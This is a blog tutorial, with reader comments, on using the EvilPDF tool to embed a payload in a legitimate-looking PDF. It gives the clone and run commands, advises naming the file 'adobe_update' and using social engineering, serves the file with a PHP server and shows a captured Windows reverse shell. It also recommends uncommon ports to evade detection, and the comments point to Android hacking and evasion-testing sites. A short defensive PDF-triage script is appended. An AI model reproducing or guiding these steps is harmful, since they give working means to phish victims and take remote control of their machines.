
Steps to embed payload in PDF [100% Working]

WRITTEN BY - KENNEDY MUTHII

Table of Contents
Pre-requisites

What you should know

Steps to embed payload in pdf with EvilPDF tool

Step 1: Installing EvilPDF tool

Step 2: Install required dependencies

Step 3: Running the evilpdf tool

Step 4: provide the path to the legitimate pdf

Step 5: Choosing the file to embed a payload on

Step 6: Choosing the name for the file.

Step 7: Setting the LHOST and the LPORT

Step 8: Setting the phishing url

Step 9: Delivering the pdf in order to gain a shell

Conclusion

Further Reading

Over the years, Adobe Reader has had a number of vulnerabilities that attackers have exploited.
Attackers embed a payload in a PDF that looks legitimate, and perhaps important, in the eyes of the victim. One
factor that makes this attack successful is that Adobe Reader is a common PDF reader on
computers around the world. Over time, Linux tools have been developed to embed a payload in a PDF, with the
main focus being on simplifying the embedding process.
By the end of this guide, you will be able to embed payload in PDF, send it to the victim and gain access to
his/her machine remotely.

WARNING:

Hacking is an illegal activity and you can be charged in a court of law. Make sure you have mutual
consent with the victim prior to attacking his/her system. This guide is for education purposes only.


Pre-requisites

Have Kali Linux Operating system installed


Have target system as a virtual machine.
Have EvilPDF tool installed on your Kali Linux.

What you should know

Knowledge of using a terminal.


Have a legitimate PDF on which we will embed a payload
Have Metasploit installed. (This is optional, and only needed if you want to start the listener from the Metasploit
terminal and generate custom payloads.)

With that in mind, let’s jump right into our tutorial.

Steps to embed payload in pdf with EvilPDF tool


EvilPDF is a minimal tool written in Python which is used to embed a payload in a PDF and launch the listener. The
creators of the tool focused on simplifying the process of launching the PDF attack.

Step 1: Installing EvilPDF tool

The first step is to clone the evilpdf repository from github. We will use the well known command to clone
the repository.

# git clone https://github.com/superzerosec/evilpdf

Cloning into 'evilpdf'...

remote: Enumerating objects: 8, done.

remote: Counting objects: 100% (8/8), done.

remote: Compressing objects: 100% (7/7), done.

remote: Total 8 (delta 0), reused 8 (delta 0), pack-reused 0

Unpacking objects: 100% (8/8), done.

Step 2: Install required dependencies

After the download is completed, we have to install the dependencies required for the tool to work without
running into errors. First change into the cloned directory.

cd evilpdf

Then install the required dependencies as listed in the evilpdf tool's official repository on GitHub.

python -m pip install pypdf2

Step 3: Running the evilpdf tool

We now run the evilpdf tool to start the process to embed payload in PDF.

python evilpdf.py

When we start the tool, it should look as shown in the screenshot below.

Step 4: provide the path to the legitimate pdf

As shown on the above screen, we have to provide a path to the legitimate pdf file on which we will embed
our payload. Make sure to use a pdf file of interest to the target. Ensure every aspect is compelling him/her
to open the file. You have to employ your social engineering skills here.

Step 5: Choosing the file to embed a payload on

In this step we choose what kind of file we want to embed in the PDF. We can embed a custom file (if you have
already generated the payload using Metasploit, you just provide its path on your PC).

└─$ python3 evilpdf.py

 __________     .__.__ __________________  ___________

 \_   _____/__  _|__|  |\______   \______ \ \_   _____/

  |    __)_\  \/ /  |  | |     ___/|    |  \ |    __)   

  |        \\   /|  |  |_|    |    |    `   \|     \    

 /_______  / \_/ |__|____/____|   /_______  /\___  /    

         \/                               \/     \/     

 v1.1 coded by @linux_choice (twitter)

 github.com/thelinuxchoice/evilpdf

[+] PDF path (Default: adobe.pdf ): /home/toxic/Desktop/lifeguide.pdf

[+] Append custom file? [Y/n] n

Step 6: Choosing the name for the file.

In this step we have to choose a name for the file. Once again, use words that will compel the victim to
download and run the file on his/her PC. In our case, we can call it adobe_update.


Step 7: Setting the LHOST and the LPORT

This is where you are required to enter the host on which the listener will run. You can use the command
below to find your LHOST.

ifconfig

Once you have set your host IP address, you will be required to choose the port to use. These host and port
settings are the ones that will be used after we embed the payload in the PDF. You should use a less
common port in order to ensure the success of your attack, since the common ports are already being used
by existing services and any malicious activity on these ports will be easily detected.


Step 8: Setting the phishing url

When required to enter the phishing URL in the next step, you can leave it as default as shown below and
wait as the evilpdf tool goes on with the process to embed the payload in the PDF. After embedding is over we just have
to start the listener. The URL is the page to which the victim will be redirected as our payload exe downloads.


Step 9: Delivering the pdf in order to gain a shell


Having completed the process to embed the payload in a PDF, we now have to expose our server in order to
deliver the PDF more easily to the victim machine. Evilpdf gives us a guide on how to do that. In the
above screen you can see the command we are to use to expose the server. In our case we can use:

php -S 192.168.0.11:3333

Below is the output when we run the command on a terminal

$ php -S 192.168.0.11:3333

[Tue Nov  9 04:33:07 2021] PHP 7.4.15 Development Server (http://192.168.0.11:3333)

We can now navigate to our browser in the target machine and enter the provided link in order to download
our pdf which has the payload.


Once the victim opens the PDF file, which we named based on the victim's interests, the reader will prompt the user
to confirm whether they want to open the file.


Once the victim confirms this prompt, we will have a remote connection to the victim’s PC.


After the connection we get a shell as shown below

[+] Start Listener? [Y/n] y

[+] Listening connection:

Ncat: Version 7.80 ( https://nmap.org/ncat )

Ncat: Listening on :::4444

Ncat: Listening on 0.0.0.0:4444

Ncat: Connection from 192.168.0.130.

Ncat: Connection from 192.168.0.130:54784.

Microsoft Windows [Version 10.0.18361.889]

(c) 2019 Microsoft Corporation. All rights reserved.

c:\Users\administrator\Downloads>dir

dir

Volume in drive C has no label.

Volume Serial Number is 7B9Y - 070D

Directory of C:\Users\administrator\Downloads

9/11/2021 4:24 AM <DIR> .

9/11/2021 4:24 AM <DIR> ..

9/11/2021 4:26 AM 20,983,845 (by-Adam-Grant)-Give-and-Take

Conclusion

In the above guide we were able to embed a payload in a PDF and run it on a victim machine, gaining access to
the victim machine the same way hackers do in order to steal valuable information from victims who fall
into their trap. A non-technical person can be lured into installing
malware on his/her computer.

We recommend that all users keep their antivirus software and operating systems up to date in order to
avoid becoming victims. Alternatively, they can choose to use other PDF readers which are more secure, and also
ensure the PDF readers are up to date. With the help of processes such as obfuscation and other antivirus
evasion techniques, a hacker can get into your PC without raising any suspicion.
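
The check below is an added example, not part of the original guide or of the EvilPDF project: it triages a PDF for the structural markers of attached files and automatic actions before the file reaches a reader. The marker grouping, the verdict names and the sample byte strings are constructed for illustration.

```python
import re

# PDF name tokens worth flagging; the grouping and verdicts are this example's assumptions.
PAYLOAD = {"EmbeddedFiles", "EmbeddedFile"}                     # an attached file is present
TRIGGER = {"OpenAction", "AA", "Launch", "JavaScript", "JS"}    # something can run on open/event

NAME_RE = re.compile(rb"/((?:#[0-9A-Fa-f]{2}|[A-Za-z0-9_.\-])+)")
HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> str:
    """Undo #xx escapes: /J#61vaScript is the same PDF name as /JavaScript."""
    return HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def triage_pdf(data: bytes) -> dict:
    """Count flagged names in the raw bytes (compressed object streams are not expanded)."""
    counts = {}
    for match in NAME_RE.finditer(data):
        name = decode_name(match.group(1))
        if name in PAYLOAD or name in TRIGGER:
            counts[name] = counts.get(name, 0) + 1
    return counts


def verdict(counts: dict) -> str:
    has_payload = any(n in PAYLOAD for n in counts)
    has_trigger = any(n in TRIGGER for n in counts)
    if has_payload and has_trigger:
        return "block"      # attachment plus a way to act on it
    if has_payload or has_trigger:
        return "review"
    return "allow"


# Constructed samples (not real documents): a plain catalog, and one with an
# attachment, an open action and a hex-escaped JavaScript name.
SAMPLE_CLEAN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
SAMPLE_ATTACH = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R "
    b"/Names << /EmbeddedFiles 3 0 R >> /OpenAction 5 0 R >>\nendobj\n"
    b"4 0 obj\n<< /Type /EmbeddedFile /Length 0 >>\nstream\n\nendstream\nendobj\n"
    b"5 0 obj\n<< /S /J#61vaScript /JS (placeholder) >>\nendobj\n"
)

if __name__ == "__main__":
    for label, sample in (("clean", SAMPLE_CLEAN), ("attachment", SAMPLE_ATTACH)):
        found = triage_pdf(sample)
        print(label, verdict(found), found)
```

A mail gateway or download proxy can run this kind of check on inbound PDFs and quarantine anything that returns "block"; a clean result only means no flagged name appears in the uncompressed part of the file.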


Further Reading

Bypassing antivirus detection on a PDF exploit


22 thoughts on “Steps to embed payload in PDF [100% Working]”

whyudontcheck
november 12, 2021 at 11:49 am

404 not found repo lul

Reply

admin
november 12, 2021 at 12:48 pm

sorry about that, updated!

Reply

200okstatushttps
november 12, 2021 at 3:52 pm

thx! now its ok

Reply

dimka
november 12, 2021 at 4:04 pm

python3 or python ?

Reply

admin
november 12, 2021 at 5:42 pm

It depends on which python you have installed.

Reply

hrutuj zode
august 31, 2022 at 10:04 am

Bro😭,

The git authentication was removed how do I install bro ?????

Reply

admin
august 31, 2022 at 10:05 pm
I didn’t get you, which authentication?

Reply

noname
january 4, 2023 at 3:42 pm

dear one method you can install the clone but clone authentication error no problem you can install
zip file and extract then use it

Reply

craig
november 22, 2022 at 11:45 am

SyntaxError: invalid syntax

Reply

craig
november 22, 2022 at 12:06 pm

[1;31m___________ .__.__ [1;93m__________________ ___________ [0m

[1;31m\_ _____/__ _|__| |[1;93m\______ \______ \ \_ _____/ [0m

[1;31m | __)_\ \/ / | |[1;93m | ___/| | \ | __) [0m

[1;77m | \\ /| | |_| | | ` \| \ [0m

[1;77m/_______ / \_/ |__|____/____| /_______ /\___ / [0m

[1;77m \/ \/ \/ [0m

[1;77mv1.1 coded by @linux_choice (twitter)

[1;77mgithub.com/thelinuxchoice/evilpdf[0m

Traceback (most recent call last):

File "C:\Users\Administrator\Desktop\evilpdf.py", line 246, in

dependencies()
File "C:\Users\Administrator\Desktop\evilpdf.py", line 19, in dependencies

os.system('command -v base64 > /dev/null 2>&1 || { echo >&2 "Install base64";


^^

NameError: name 'os' is not defined

Reply

admin
december 12, 2022 at 2:56 pm

“You are trying to run the tool on Windows. Check this article https://www.golinuxcloud.com/setup-virtual-penetration-testing-lab/ on how to run Linux on a virtual box”

Reply

anil
november 25, 2022 at 5:28 am

can you make pdf payload for Android full process

Reply

admin
december 12, 2022 at 2:58 pm

Hi Anil,

You can check on how to hack android remotely using L3MON


https://www.golinuxcloud.com/l3mon-hack-android-mobile-remotely/

Reply

tarifreeman
december 11, 2022 at 7:22 am
Hi, when I start the php command when I go to the website I have : “404 not found” why??

Reply

admin
december 12, 2022 at 2:57 pm

Hi,

Please paste the error generated

Reply

jhj
december 11, 2022 at 9:59 pm

nice

Reply

tnt
december 21, 2022 at 11:31 pm

Hello, Thank you for that Tutorial. I was able to create everything and when I’m executing the complete
command php -S 0.0.0.0:3333 & \ & ssh -R 80:localhost:3333 etc….. I’m getting the link that I must use
and when using that link I’m able to download the file but when opening it nothing happen and my
listener is on. Would you have a hint ? Do I absolutely need to open the file with Adobe reader ? Or If I
open it in linux for example it should work ?

Thank you

Reply

tnt
december 21, 2022 at 11:45 pm

I also tried to open the .pdf with my Android cell phone and it’s also not working.

Reply

admin
december 23, 2022 at 11:26 am

Hello, you have to open the pdf using Adobe Reader on a windows pc.

Reply

rafael
january 25, 2023 at 1:10 pm

Great tutorial. If I just want to work with the payload, the pdf file to analyze it and using pdfcop I get a
hash that I insert into virustotal but the hash does not have matches in virustotal so it does not tell me
that the file is infected? Is there a way to analyze this file in a different way to see the payload in the PDF
file?

Reply

admin
january 25, 2023 at 4:35 pm

You can use https://antiscan.me/ to scan the PDF file.

Reply

rafael araya
january 25, 2023 at 9:52 pm

Much appreciated.

Reply
